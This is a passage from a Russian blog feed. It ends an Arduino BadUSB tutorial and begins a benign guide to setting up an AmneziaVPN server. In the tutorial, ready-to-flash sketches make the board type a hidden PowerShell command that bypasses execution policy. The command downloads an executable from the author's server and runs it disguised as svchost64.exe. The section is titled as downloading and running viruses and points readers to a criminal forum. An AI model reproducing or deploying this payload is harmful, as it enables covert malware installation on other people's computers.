    &lt;li id=&quot;Q51B&quot;&gt;&lt;code&gt;Keyboard.releaseAll();&lt;/code&gt; - отжимает все кнопки.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;F9Go&quot;&gt;И так, теперь ещё раз:&lt;/p&gt;
  &lt;ul id=&quot;pBdF&quot;&gt;
    &lt;li id=&quot;Qyzf&quot;&gt;&lt;code&gt;Keyboard.begin();&lt;/code&gt; делает из нашей платы клавиатуру (не забудьте вначале импортировать библиотеку командой &lt;code&gt;#include &amp;lt;Keyboard.h&amp;gt;&lt;/code&gt;)&lt;/li&gt;
    &lt;li id=&quot;iUsC&quot;&gt;&lt;code&gt;delay(мсек)&lt;/code&gt; даёт нам паузу. 2000 мсек нужно чтобы библиотека успела прогрузиться платой и системой, 50-75 мсек нужно для того чтобы клавиша прожалась&lt;/li&gt;
    &lt;li id=&quot;SJFJ&quot;&gt;&lt;code&gt;Keyboard.press (клавиша)&lt;/code&gt; выполняет функцию ЗАЖАТИЯ клавиши. Мы можем передать пробел и любую клавишу внутри скобок в кавычках, напр. &lt;code&gt;Keyboard.press (&amp;#x27; &amp;#x27;)&lt;/code&gt; или &lt;code&gt;Keyboard.press (&amp;#x27;g&amp;#x27;)&lt;/code&gt;. Если нам нужно зажать ctrl или подобную клавишу, смотрим &lt;a href=&quot;https://github.com/arduino-libraries/Keyboard/blob/master/src/Keyboard.h&quot; target=&quot;_blank&quot;&gt;документацию&lt;/a&gt;, напр. шифт это KEY_LEFT_SHIFT и будет команда выглядеть так: &lt;code&gt;Keyboard.press (KEY_LEFT_SHIFT)&lt;/code&gt;. Что важно - БЕЗ КАВЫЧЕК.&lt;/li&gt;
    &lt;li id=&quot;qben&quot;&gt;&lt;code&gt;Keyboard.releaseAll()&lt;/code&gt; ОТЖИМАЕТ ВСЕ КНОПКИ!!! Если не отжать то зажатые клавиши не дадут нормально пользоваться пк, не говоря о том что ваш payload не сможет выполниться. Хотя если у вас цель похулиганить можете убрать эту функцию и поприкалываться над товарищами.&lt;/li&gt;
    &lt;li id=&quot;KISb&quot;&gt;И ещё есть команда &lt;code&gt;Keyboard.release(клавиша)&lt;/code&gt; которая отжимает конкретную клавишу, если это вам конечно понадобится.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;ncya&quot;&gt;С кодом разобрались, давайте запустим команду:&lt;/p&gt;
  &lt;figure id=&quot;uIYY&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b9/32/b932d21a-995e-4e72-a234-ef0770be9161.png&quot; width=&quot;1914&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;qU9n&quot;&gt;Всё работает, остается только написать payload.&lt;/p&gt;
  &lt;p id=&quot;38M4&quot;&gt;Давайте допишем нашу программу следующим образом:&lt;/p&gt;
  &lt;p id=&quot;7ThB&quot;&gt;&lt;code&gt;#include &amp;lt;Keyboard.h&amp;gt;&lt;br /&gt;void setup() {&lt;br /&gt;  Keyboard.begin();&lt;br /&gt;  delay(2000);&lt;br /&gt;  Keyboard.press(KEY_LEFT_GUI);&lt;br /&gt;  Keyboard.press(&amp;#x27;r&amp;#x27;);&lt;br /&gt;  delay(50);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;c&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;m&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;d&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27; &amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;/&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;c&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27; &amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;n&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;o&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;t&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;e&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;p&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;a&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;d&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;&amp;amp;&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;c&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;a&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;l&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(&amp;#x27;c&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  Keyboard.press(KEY_RETURN);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;}&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;94np&quot;&gt;&lt;code&gt;void loop() {&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;lfW7&quot;&gt;&lt;code&gt;}&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;eK8L&quot;&gt;Алгоритм здесь следующий - мы просто хотим выполнить в программе Выполнить команду &lt;code&gt;cmd /c notepad&amp;amp;calc&lt;/code&gt; которая запустит с помощью командной строки блокнот и клавиатуру.&lt;/p&gt;
  &lt;p id=&quot;40lV&quot;&gt;Чтобы нам нажать на одну кнопку нам нужно написать три строчки:&lt;/p&gt;
  &lt;p id=&quot;opOz&quot;&gt;&lt;code&gt;Keyboard.press(&amp;#x27;кнопка&amp;#x27;);&lt;br /&gt;  delay(45);&lt;br /&gt;  Keyboard.releaseAll();&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;Gv1v&quot;&gt;Пробуем запустить прогу:&lt;/p&gt;
  &lt;figure id=&quot;XjAL&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ad/22/ad2294cf-1b52-4db7-890a-3e1bb0239b29.png&quot; width=&quot;1760&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;uJXF&quot;&gt;Как видим всё запустилось. Но если мы переключим раскладку на русский то всё поломается:&lt;/p&gt;
  &lt;figure id=&quot;fgvk&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/46/72/4672ab71-f024-4c4e-bf59-7698273b2967.png&quot; width=&quot;1579&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;D0Ve&quot;&gt;Закачиваем и запускаем вирусы&lt;/h3&gt;
  &lt;p id=&quot;kJXC&quot;&gt;Теперь разберем &lt;a href=&quot;https://xss.is/threads/76979/&quot; target=&quot;_blank&quot;&gt;код&lt;/a&gt; для скрытой загрузки и запуска файла:&lt;/p&gt;
  &lt;p id=&quot;dtLE&quot;&gt;&lt;code&gt;#include&amp;lt;Keyboard.h&amp;gt;&lt;br /&gt;#define KEY_DELAY 50&lt;br /&gt;const char command [] = &amp;quot; &amp;quot; ;&lt;br /&gt;void setup() {&lt;br /&gt;  Keyboard.begin();&lt;br /&gt;  delay(3000);&lt;br /&gt;}&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;2vly&quot;&gt;&lt;code&gt;void loop() {&lt;br /&gt;  //Pressing Win+r shortcut&lt;br /&gt;  Keyboard.press(KEY_LEFT_GUI);&lt;br /&gt;  Keyboard.press(&amp;#x27;r&amp;#x27;);&lt;br /&gt;  delay(KEY_DELAY);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;  delay(KEY_DELAY*5);&lt;br /&gt;  Keyboard.println(&amp;quot;powershell -NoP -NonI -W Hidden -Exec Bypass \&amp;quot;IEX (New-Object System.Net.WebClient).DownloadFile(&amp;#x27;&lt;a href=&quot;http://server_ip/file.exe&quot; target=&quot;_blank&quot;&gt;http://server_ip/file.exe&lt;/a&gt;&amp;#x27;,\\\&amp;quot;$env:temp\\svchost64.exe\\\&amp;quot;); Start-Process \\\&amp;quot;$env:temp\\svchost64.exe\\\&amp;quot;\&amp;quot;&amp;quot;);&lt;br /&gt;  delay(KEY_DELAY*5);//A delay to ensure that cmd window has been started&lt;br /&gt;  delay(10000000);&lt;br /&gt;}&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;ropv&quot;&gt;Создаем VPS, устанавливаем apache2, загружаем на сервер наш вредонос. Забираем на него ссылку:&lt;/p&gt;
  &lt;p id=&quot;2mya&quot;&gt;&lt;/p&gt;
  &lt;figure id=&quot;jSaB&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d1/57/d157d583-1c19-4324-96d3-02843e01eb9e.png&quot; width=&quot;653&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;iOk3&quot;&gt;Вставляем ссылку в &lt;code&gt;Keyboard.println ()&lt;/code&gt; где это написано. прям в кавычки:&lt;/p&gt;
  &lt;p id=&quot;UgUV&quot;&gt;Keyboard.println(&amp;quot;powershell -NoP -NonI -W Hidden -Exec Bypass \&amp;quot;IEX (New-Object System.Net.WebClient).DownloadFile(&amp;#x27;http://62.113.104.126/crack.exe,\\\&amp;quot;$env:temp\\svchost64.exe\\\&amp;quot;); Start-Process \\\&amp;quot;$env:temp\\svchost64.exe\\\&amp;quot;\&amp;quot;&amp;quot;);&lt;/p&gt;
  &lt;p id=&quot;HTUb&quot;&gt;Прошиваем и проверяем ctrl+U:&lt;/p&gt;
  &lt;figure id=&quot;EyGb&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/ce/1d/ce1da377-ab53-4b1b-b974-4e63baba3871.png&quot; width=&quot;1818&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;V1nu&quot;&gt;Как видим программа успешно скачалась и запустилась&lt;/p&gt;
  &lt;p id=&quot;u5SC&quot;&gt;Вам останется только поменять ссылку в кавычках &lt;code&gt;DownloadFile(&amp;#x27;&lt;a href=&quot;http://server_ip/file.exe&quot; target=&quot;_blank&quot;&gt;http://server_ip/file.exe&lt;/a&gt;&amp;#x27;,&lt;/code&gt; на своё значение.&lt;/p&gt;
  &lt;figure id=&quot;MtDA&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/79/c9/79c93bb6-3577-447e-b8ab-bf9a82677f94.png&quot; width=&quot;1662&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;oPJf&quot;&gt;Теперь остается затронуть последний момент - цикл.&lt;/p&gt;
  &lt;h3 id=&quot;w6sq&quot;&gt;Делаем цикл for для автоматизации ввода команды&lt;/h3&gt;
  &lt;p id=&quot;relf&quot;&gt;Рассмотрим такой код:&lt;/p&gt;
  &lt;p id=&quot;RZtY&quot;&gt;&lt;code&gt;#include &amp;lt;Keyboard.h&amp;gt;&lt;br /&gt;void setup() {&lt;br /&gt;  Keyboard.begin();&lt;br /&gt;  delay(2000);&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;D8FS&quot;&gt;&lt;code&gt;  Keyboard.press(KEY_LEFT_GUI);&lt;br /&gt;  Keyboard.press(&amp;#x27;r&amp;#x27;);&lt;br /&gt;  delay(50);&lt;br /&gt;  Keyboard.releaseAll();&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;c6Ee&quot;&gt;&lt;code&gt;  char* x = &amp;quot;cmd /c notepad&amp;amp;calc&amp;quot;;&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;GNtJ&quot;&gt;&lt;code&gt;  for (int i = 0; i &amp;lt; strlen(x); i++)&lt;br /&gt;  {&lt;br /&gt;    Keyboard.press(x[i]);&lt;br /&gt;    delay(50);&lt;br /&gt;    Keyboard.releaseAll();&lt;br /&gt;  }&lt;br /&gt;  Keyboard.press(KEY_RETURN);&lt;br /&gt;  delay(50);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;}&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;6Ii2&quot;&gt;&lt;code&gt;void loop() {&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;ZClt&quot;&gt;&lt;code&gt;}&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;ZeDZ&quot;&gt;Здесь в общем то вписывается в программу Выполнить команда &lt;code&gt;cmd /c&lt;/code&gt; с последующей полезной нагрузкой. Но чтобы нам не вводить символы вручную, за нас создается счётчик i, который проходится по каждому символу из переменной x.&lt;/p&gt;
  &lt;p id=&quot;XNEr&quot;&gt;Всё что вам нужно - поменять содержимое x на своё, например:&lt;/p&gt;
  &lt;p id=&quot;ku1n&quot;&gt;&lt;code&gt;char* x = &amp;quot;powershell -NoP -NonI -W Hidden -Exec Bypass \&amp;quot;IEX (New-Object System.Net.WebClient).DownloadFile(&amp;#x27;&lt;a href=&quot;http://server_ip/file.exe&quot; target=&quot;_blank&quot;&gt;http://server_ip/file.exe&lt;/a&gt;&amp;#x27;,\\\&amp;quot;$env:temp\\svchost64.exe\\\&amp;quot;); Start-Process \\\&amp;quot;$env:temp\\svchost64.exe\\\&amp;quot;\&amp;quot;&amp;quot;;&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;KSp9&quot;&gt;Тут как видим у нас ошибка из-за того что первая буква не успевает нажаться:&lt;/p&gt;
  &lt;figure id=&quot;gUGL&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/42/84/428472ae-8090-48f4-8ceb-d95d7082aae2.png&quot; width=&quot;1918&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;FM4B&quot;&gt;Попробуем добавить немного задержки после открытия программы Выполнить:&lt;/p&gt;
  &lt;figure id=&quot;8ZiC&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5b/33/5b33d627-5b61-4860-a756-efa57495c691.png&quot; width=&quot;1876&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;vsqD&quot;&gt;Теперь проверяем и всё работает:&lt;/p&gt;
  &lt;figure id=&quot;mAfP&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/24/ed/24ed9fc3-543b-4221-b123-7053cf27efb8.png&quot; width=&quot;1901&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;fqcZ&quot;&gt;Выводы&lt;/h3&gt;
  &lt;p id=&quot;CIqT&quot;&gt;Arduino - достаточно дешевые и эффективные платы, которые подходят для самых различных задач, начиная от имитации клавиатур и мышек, заканчивая анализаторами радиотраффика и даже роботами.&lt;/p&gt;
  &lt;p id=&quot;9V1i&quot;&gt;В отличии от готовых флагманских решений типа &lt;a href=&quot;https://flipperzero.one/&quot; target=&quot;_blank&quot;&gt;Flipper Zero&lt;/a&gt; или &lt;a href=&quot;https://qpsk.ru/hackrf-one&quot; target=&quot;_blank&quot;&gt;HackRF ONE&lt;/a&gt;, arduino учит легкому погружению в язык программирования C, самостоятельному решению задач и сборке собственных портативных устройств для хакинга.&lt;/p&gt;
  &lt;p id=&quot;LRCp&quot;&gt;Подобные микроконтроллеры станут отличным стартом в мир аппаратного хакинга и сильно повысят ваши скиллы на фоне других участников комьюнити.&lt;/p&gt;
  &lt;p id=&quot;cz0f&quot;&gt;Благодарю за прочтение статьи.&lt;/p&gt;
  &lt;p id=&quot;gelH&quot;&gt;Готовые скетчи с кодом для Arduino IDE можно скачать &lt;a href=&quot;https://t.me/hunterghoulchat/49?single&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;.&lt;/p&gt;
  &lt;h3 id=&quot;20Kj&quot;&gt;Список полезной литературы&lt;/h3&gt;
  &lt;p id=&quot;6ThS&quot;&gt;&lt;a href=&quot;https://xss.is/forums/5/&quot; target=&quot;_blank&quot;&gt;https://xss.is/forums/5/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;6yeV&quot;&gt;&lt;a href=&quot;https://xss.is/threads/76979/&quot; target=&quot;_blank&quot;&gt;https://xss.is/threads/76979/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;ayMG&quot;&gt;&lt;a href=&quot;https://xss.is/threads/125276/&quot; target=&quot;_blank&quot;&gt;https://xss.is/threads/125276/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;pc4m&quot;&gt;&lt;a href=&quot;https://xss.is/threads/124180/&quot; target=&quot;_blank&quot;&gt;https://xss.is/threads/124180/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;U1sp&quot;&gt;&lt;a href=&quot;https://xakep.ru/?s=arduino&quot; target=&quot;_blank&quot;&gt;https://xakep.ru/?s=arduino&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;fnWt&quot;&gt;&lt;a href=&quot;https://xakep.ru/2021/06/17/gsm-ducky/&quot; target=&quot;_blank&quot;&gt;https://xakep.ru/2021/06/17/gsm-ducky/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;kSss&quot;&gt;&lt;a href=&quot;https://codeby.net/forums/oborudovanie-dlja-pentesta.192/&quot; target=&quot;_blank&quot;&gt;https://codeby.net/forums/oborudovanie-dlja-pentesta.192/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;hc0R&quot;&gt;&lt;a href=&quot;https://codeby.net/threads/besprovodnaja-hid-ataka-s-ispolzovaniem-arduino-mkr1000-utochka-dlja-wi-fi-seti.73761/&quot; target=&quot;_blank&quot;&gt;https://codeby.net/threads/besprovodnaja-hid-ataka-s-ispolzovaniem-arduino-mkr1000-utochka-dlja-wi-fi-seti.73761/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;4WYe&quot;&gt;&lt;a href=&quot;https://codeby.net/threads/kontroller-graficheskogo-interfejsa-dlja-proektov-arduino-remotexy.72260/&quot; target=&quot;_blank&quot;&gt;https://codeby.net/threads/kontroller-graficheskogo-interfejsa-dlja-proektov-arduino-remotexy.72260/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;ibsK&quot;&gt;&lt;a href=&quot;https://codeby.net/threads/sobiraem-dongl-dlja-raboty-s-beskontaktnymi-kartami.72019/&quot; target=&quot;_blank&quot;&gt;https://codeby.net/threads/sobiraem-dongl-dlja-raboty-s-beskontaktnymi-kartami.72019/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;P7J3&quot;&gt;&lt;a href=&quot;https://codeby.net/threads/bad-usb-ili-kak-ja-utok-razvodil-prakticheskoe-posobie-po-rubber-duck.71821/&quot; target=&quot;_blank&quot;&gt;https://codeby.net/threads/bad-usb-ili-kak-ja-utok-razvodil-prakticheskoe-posobie-po-rubber-duck.71821/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;nLbi&quot;&gt;&lt;a href=&quot;https://codeby.net/threads/opredeljaem-kto-doma-s-pomoschju-esp8266.66662/&quot; target=&quot;_blank&quot;&gt;https://codeby.net/threads/opredeljaem-kto-doma-s-pomoschju-esp8266.66662/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;Bgvq&quot;&gt;&lt;a href=&quot;https://codeby.net/threads/arduino-totp-ili-google-authenticator-svoimi-rukami.61344/&quot; target=&quot;_blank&quot;&gt;https://codeby.net/threads/arduino-totp-ili-google-authenticator-svoimi-rukami.61344/&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>hunterghoul_team:amnezia-vpn</id><link rel="alternate" type="text/html" href="https://teletype.in/@hunterghoul_team/amnezia-vpn?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hunterghoul_team"></link><title>AmneziaVPN - делаем свой VPN-сервер без всяких знаний</title><published>2024-11-04T15:44:38.838Z</published><updated>2024-11-04T15:55:44.919Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/23/c5/23c521fb-02f9-4912-a67e-f84e23eb05bb.png"></media:thumbnail><category term="anonimity" label="Anonimity"></category><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/a6/c6/a6c69c36-63a2-4758-9ecd-1f2c0e043a85.png&quot;&gt;В условиях затянувшейся информационной войны вялые попытки установить тоталитарный контроль за источниками поставки информации в глобальной сети Интернет обретают всё более продвинутые методики.</summary><content type="html">
  &lt;h3 id=&quot;I2uX&quot;&gt;Дисклеймер&lt;/h3&gt;
  &lt;p id=&quot;U1pn&quot;&gt;Данная статья носит образовательных характер. Описанные действия используемые с целью обхода блокировок к информационным ресурсам могут караться действующим законодательством. Автор призывает не нарушать закон и использовать полученную информацию исключительно в образовательных целях.&lt;/p&gt;
  &lt;h3 id=&quot;6PhU&quot;&gt;AmneziaVPN - что это за зверь&lt;/h3&gt;
  &lt;figure id=&quot;7pvs&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a6/c6/a6c69c36-63a2-4758-9ecd-1f2c0e043a85.png&quot; width=&quot;1200&quot; /&gt;
    &lt;figcaption&gt;Изображение AmneziaVPN. Источник - GitHub разработчика.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;IGgE&quot;&gt;В условиях затянувшейся информационной войны вялые попытки установить тоталитарный контроль за источниками поставки информации в глобальной сети Интернет обретают всё более продвинутые методики. Регулирующие органы, ответственные за контроль оборота информацией, разрабатывают новые подходы к идентификации и блокировке ресурсов, подпадающих под определение опасных, не рекомендованных информационных источников и так далее.&lt;/p&gt;
  &lt;p id=&quot;589f&quot;&gt;В связи с всё больше растущим ограничением в свободном получении и обмене информацией, активисты, выступающие за права свободного обмена и получения информацией, разрабатывают различные приложения и протоколы обхода средств защиты интернет-провайдеров.&lt;/p&gt;
  &lt;p id=&quot;Pg1d&quot;&gt;Одним из решений, о котором я вам сегодня хотел бы рассказать - кросс-платформерное приложение AmneziaVPN.&lt;/p&gt;
  &lt;p id=&quot;vEQz&quot;&gt;На удивление, посмотрев в Telegram инфу по данной тулзе, не нашёл большого количества статей на счёт этой штуки, что очень зря.&lt;/p&gt;
  &lt;figure id=&quot;IAkD&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/ff/64/ff6464e6-408e-4e8c-9575-0b32d8e744e6.png&quot; width=&quot;637&quot; /&gt;
    &lt;figcaption&gt;Нет статей, но тема обсуждаемая.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;OOwy&quot;&gt;И тут я не просто так решил начать именно с данной приложухи - ведь с помощью её вы сможете развернуть множество сервисов для обеспечения своей анонимности без знаний и навыков работы с Linux сервером. И это прекрасно.&lt;/p&gt;
  &lt;p id=&quot;2Jvg&quot;&gt;Помимо этого AmneziaVPN поддерживает огромное количество VPN протоколов:&lt;/p&gt;
  &lt;figure id=&quot;ibgO&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5c/35/5c35e90d-48dd-4f26-92d3-9b38344e844c.png&quot; width=&quot;809&quot; /&gt;
    &lt;figcaption&gt;Список доступных протоколов и иных сервисов.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;OTPT&quot;&gt;Кто хочет подробнее прочитать про &lt;a href=&quot;https://ru.wikipedia.org/wiki/VPN&quot; target=&quot;_blank&quot;&gt;VPN&lt;/a&gt; - можете изучить мою небольшую &lt;a href=&quot;https://tenchat.ru/media/2750772-pochemu-vpn-nikogda-ne-zablokiruyut&quot; target=&quot;_blank&quot;&gt;статью&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;lMwK&quot;&gt;Если кратко: VPN - это установление зашифрованного соединения между вашим устройством и сервером, на котором установлен VPN-сервис. В зависимости от сервиса будет использоваться какой-то конкретный VPN протокол, а для его работы будет использоваться какое-то конкретное приложение, которое поддерживает установление VPN соединения по этому протоколу. После установки соединения к ресурсам, на которые мы хотим зайти, заходим не мы, а наш сервер, как бы выступая посредником. Короче, в &lt;a href=&quot;https://tenchat.ru/media/2750772-pochemu-vpn-nikogda-ne-zablokiruyut&quot; target=&quot;_blank&quot;&gt;статье&lt;/a&gt; читайте, описал там.&lt;/p&gt;
  &lt;p id=&quot;4Rxq&quot;&gt;Обычно такое соединение нужно для доступа к внутренним сервисам корпоративной среды, но обыватели чаще используют эту технологию чтобы получать доступ ко всяким заблокированным порнушкам, а хакеры и исследователи - для анонимности, проведения сканирований и анализа заблокированных (и не только) ресурсов.&lt;/p&gt;
  &lt;h3 id=&quot;a7oX&quot;&gt;Делаем свой VPN-сервер&lt;/h3&gt;
  &lt;p id=&quot;G2qn&quot;&gt;И так, первое с чего начнем - это традиционно с аренды VPS. Арендовываем Linux сервер, в моём случае Ubuntu 24.04:&lt;/p&gt;
  &lt;figure id=&quot;Zpzq&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/72/a0/72a06d8b-6981-4d35-8858-70577ec28c13.png&quot; width=&quot;732&quot; /&gt;
    &lt;figcaption&gt;Арендованный сервер&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;84Cf&quot;&gt;В принципе вы можете найти дешёвый вариант за например 500 рублей в месяц и спокойно оплачивать сервак. А если поделитесь со своими товарищами и друзьями сервисом - можете поделить деньги на оплату и пользоваться им за сущие копейки, не боясь блокировки со стороны провайдера.&lt;/p&gt;
  &lt;p id=&quot;9REa&quot;&gt;Теперь скачаем последнюю версию AmneziaVPN. Сделать это можно разными способами:&lt;/p&gt;
  &lt;ol id=&quot;MFDd&quot;&gt;
    &lt;li id=&quot;5deK&quot;&gt;С &lt;a href=&quot;https://amnezia.org/&quot; target=&quot;_blank&quot;&gt;оф. сайта&lt;/a&gt; - но может быть заблочен в вашей стране.&lt;/li&gt;
    &lt;li id=&quot;mH3V&quot;&gt;Воспользовавшись &lt;a href=&quot;https://storage.googleapis.com/kldscp/amnezia.org/ru&quot; target=&quot;_blank&quot;&gt;зеркалом&lt;/a&gt; - на случай если оф. сайт заблочен.&lt;/li&gt;
    &lt;li id=&quot;lRBL&quot;&gt;Скачать с &lt;a href=&quot;https://github.com/amnezia-vpn/amnezia-client/releases&quot; target=&quot;_blank&quot;&gt;GitHub&lt;/a&gt; - там же можно глянуть &lt;a href=&quot;https://github.com/amnezia-vpn/amnezia-client&quot; target=&quot;_blank&quot;&gt;исходники&lt;/a&gt; приложения.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;XtDt&quot;&gt;P. S. кстати можете почитать &lt;a href=&quot;https://docs.amnezia.org/&quot; target=&quot;_blank&quot;&gt;документацию&lt;/a&gt; (возможно потребуется VPN который мы щас сделаем).&lt;/p&gt;
  &lt;p id=&quot;XZI8&quot;&gt;Я буду ставить приложение на Kali, так как с виндой и андроидом думаю всё и так понятно.&lt;/p&gt;
  &lt;figure id=&quot;rsx4&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e4/ac/e4acc38c-206b-4a00-81df-e2d5fb59f8cb.png&quot; width=&quot;1890&quot; /&gt;
    &lt;figcaption&gt;Качаем установщик по &lt;a href=&quot;https://github.com/amnezia-vpn/amnezia-client/releases&quot; target=&quot;_blank&quot;&gt;ссылке&lt;/a&gt;.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Itzo&quot;&gt;Распаковываем из архивов наш файл установщика:&lt;/p&gt;
  &lt;figure id=&quot;08UZ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f9/2c/f92cd120-ed3d-41d8-9e59-bd6567294ec2.png&quot; width=&quot;1336&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;dWVw&quot;&gt;И запускаем командой: &lt;code&gt;./AmneziaVPN_Linux_Installer.bin&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;aNZP&quot;&gt;В открывшемся установщике жмем далее и вводим пароль от нашего аккаунта:&lt;/p&gt;
  &lt;figure id=&quot;1QjX&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/cf/9d/cf9d8ea1-dd5f-4eda-b5ac-2a033a8ef3e4.png&quot; width=&quot;696&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;5A8A&quot;&gt;После установки приложения вводим в терминале команду: &lt;code&gt;AmneziaVPN&lt;/code&gt;&lt;/p&gt;
